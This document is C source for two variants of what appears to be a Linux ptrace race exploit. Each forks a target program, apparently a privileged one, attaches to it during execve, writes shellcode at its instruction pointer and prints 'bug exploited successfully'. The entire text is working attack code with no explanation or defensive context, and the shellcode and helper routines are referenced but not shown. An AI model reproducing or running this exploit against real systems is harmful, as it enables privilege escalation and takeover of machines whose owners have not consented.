int main (int argc, char *argv[]) { char *filename = VICTIM; pid_t victim; int error, i; struct user_regs_struct regs; /* take our command args if you wanna play with other progs */ if (argc > 1) filename = argv[1]; signal (CS_SIGNAL, cs_sig_handler); victim = fork (); if (victim < 0) { perror ("fork: victim"); exit (-1); } if (victim == 0) do_victim (filename); kill (victim, CS_SIGNAL); while (!cs_detector); if (ptrace (PTRACE_ATTACH, victim)) { perror ("ptrace: PTRACE_ATTACH"); goto exit; } if (check_execve (victim, filename)) goto exit; (void) waitpid (victim, NULL, WUNTRACED); if (ptrace (PTRACE_CONT, victim, 0, 0)) { perror ("ptrace: PTRACE_CONT"); goto exit; } (void) waitpid (victim, NULL, WUNTRACED); if (ptrace (PTRACE_GETREGS, victim, 0, ®s)) { perror ("ptrace: PTRACE_GETREGS"); goto exit; } /* make sure that last null is in there */ for (i = 0; i <= strlen (shellcode); i += 4) { if (ptrace (PTRACE_POKETEXT, victim, regs.eip + i, *(int *) (shellcode + i))) { perror ("ptrace: PTRACE_POKETEXT"); goto exit; } } if (ptrace (PTRACE_SETREGS, victim, 0, ®s)) { perror ("ptrace: PTRACE_SETREGS"); goto exit; } fprintf (stderr, "bug exploited successfully.\nenjoy!\n"); if (ptrace (PTRACE_DETACH, victim, 0, 0)) { perror ("ptrace: PTRACE_DETACH"); goto exit; } (void) waitpid (victim, NULL, 0); return 0; exit: fprintf (stderr, "d0h! error!\n"); kill (victim, SIGKILL); return -1; }
int main(int argc, char * argv[]) { char * filename=VICTIM; pid_t victim; int error, i; unsigned long eip=SHELLCODE; struct user_regs_struct regs; if (argc>1) filename=argv[1]; if (argc>2) eip=strtoul(argv[2], NULL, 16); signal(CS_SIGNAL, cs_sig_handler); victim=fork(); if (victim<0) { perror("fork: victim"); exit(-1); } if (victim==0) do_victim(filename); kill(victim, CS_SIGNAL); while (!cs_detector) ; if (ptrace(PTRACE_ATTACH, victim)) { perror("ptrace: PTRACE_ATTACH"); goto exit; } if (check_execve(victim, filename)) goto exit; (void)waitpid(victim, NULL, WUNTRACED); if (ptrace(PTRACE_CONT, victim, 0, 0)) { perror("ptrace: PTRACE_CONT"); goto exit; } (void)waitpid(victim, NULL, WUNTRACED); if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) { perror("ptrace: PTRACE_GETREGS"); goto exit; } regs.eip=eip; for (i=0; i<strlen(shellcode); i+=4) { if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i, *(int*)(shellcode+i))) { perror("ptrace: PTRACE_POKETEXT"); goto exit; } } if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) { perror("ptrace: PTRACE_GETREGS"); goto exit; } fprintf(stderr, "Bug exploited successfully.\n"); if (ptrace(PTRACE_DETACH, victim, 0, 0)) { perror("ptrace: PTRACE_CONT"); goto exit; } (void)waitpid(victim, NULL, 0); return 0; exit: fprintf(stderr, "Error!\n"); kill(victim, SIGKILL); return -1; }